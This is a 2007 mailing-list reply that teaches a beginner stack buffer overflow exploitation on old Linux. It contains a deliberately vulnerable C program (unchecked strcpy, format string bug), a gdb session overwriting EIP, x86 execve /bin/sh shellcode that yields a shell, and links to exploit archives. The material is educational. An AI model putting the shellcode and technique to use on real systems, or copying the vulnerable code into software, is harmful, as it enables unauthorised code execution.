Vulnerability Development mailing list archives
Re: Learning buffer overflow help
From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Thu, 7 Jun 2007 11:39:44 +0200 (CEST)
Hey Eric, On Wed, 6 Jun 2007, erk_3 () hotmail com wrote:
Hello everyone, I have studied alot on buffer overflows and I understand the theory behind it. Thing is, any example I follow says once you can overwrite the EIP you can control the flow of the program (in a nutshell).
[snip]I guess you're missing something basic here... Take a look at the following example:
nobody@slack10:/tmp$ cat /etc/slackware-version Slackware 10.2.0 nobody@slack10:/tmp$ uname -aLinux slack10 2.4.31 #6 Sun Jun 5 19:04:47 PDT 2005 i686 unknown unknown GNU/Linux
nobody@slack10:/tmp$ cat > vuln.c #include <stdio.h> #include <string.h> int main (int argc, char *argv[]) { char name[4]; strcpy(name, argv[1]); printf(name); /* there's a pretty format string bug here too;) */ } nobody@slack10:/tmp$ make vuln cc vuln.c -o vuln nobody@slack10:/tmp$ gdb -q ./vuln Using host libthread_db library "/lib/libthread_db.so.1". (gdb) r 1234AAAABBBB Starting program: /tmp/vuln 1234AAAABBBB Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb)So far, so good. Now, to overwrite the %eip with an arbitrary valid address, you should do something like that instead:
(gdb) r `printf "1234AAAA\xee\xee\xff\xbf"` Starting program: /tmp/vuln `printf "1234AAAA\xee\xee\xff\xbf"` Program received signal SIGILL, Illegal instruction. 0xbfffeeee in ?? () Finally, to actually exploit the overflow to run an arbitrary shellcode:nobody@slack10:/tmp$ export SC=`printf "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"`
[...] (gdb) x/s 0xbfffff73 0xbfffff73: "SC=1Ph//shh/bin\211PS\211\231\v\200" (gdb) x/s 0xbfffff76 0xbfffff76: "1Ph//shh/bin\211PS\211\231\v\200" (gdb) r `printf "1234AAAA\x76\xff\xff\xbf"` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /tmp/vuln `printf "1234AAAA\x76\xff\xff\xbf"` Program received signal SIGTRAP, Trace/breakpoint trap. 0x400007b0 in _start () from /lib/ld-linux.so.2 (gdb) c Continuing. sh-3.00$This is what happens on a kinda old system based on Linux kernel 2.4, without additional protections. YMMV on newer platforms...
You may also want to check out some exploitation examples here: http://www.0xdeadbeef.info/code/abo-exploits.tgz http://www.0xdeadbeef.info/code/fs-exploits.tgz http://www.0xdeadbeef.info/code/vulndev-exploits.tgz http://www.0xdeadbeef.info/code/linux-x86-exploits.tgz http://www.0xdeadbeef.info/code/solaris-sparc-exploits.tgz Cheers, -- Marco Ivaldi Antifork Research, Inc. http://0xdeadbeef.info/ 3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707
Current thread:
- Learning buffer overflow help erk_3 (Jun 06)
- Re: Learning buffer overflow help Dude VanWinkle (Jun 07)
- <Possible follow-ups>
- Re: Learning buffer overflow help mailbox () martinelli com (Jun 07)
- Re: Learning buffer overflow help Marco Ivaldi (Jun 07)
- Re: Learning buffer overflow help KaCo678 (Jun 07)
- Re: Re: Learning buffer overflow help erk_3 (Jun 07)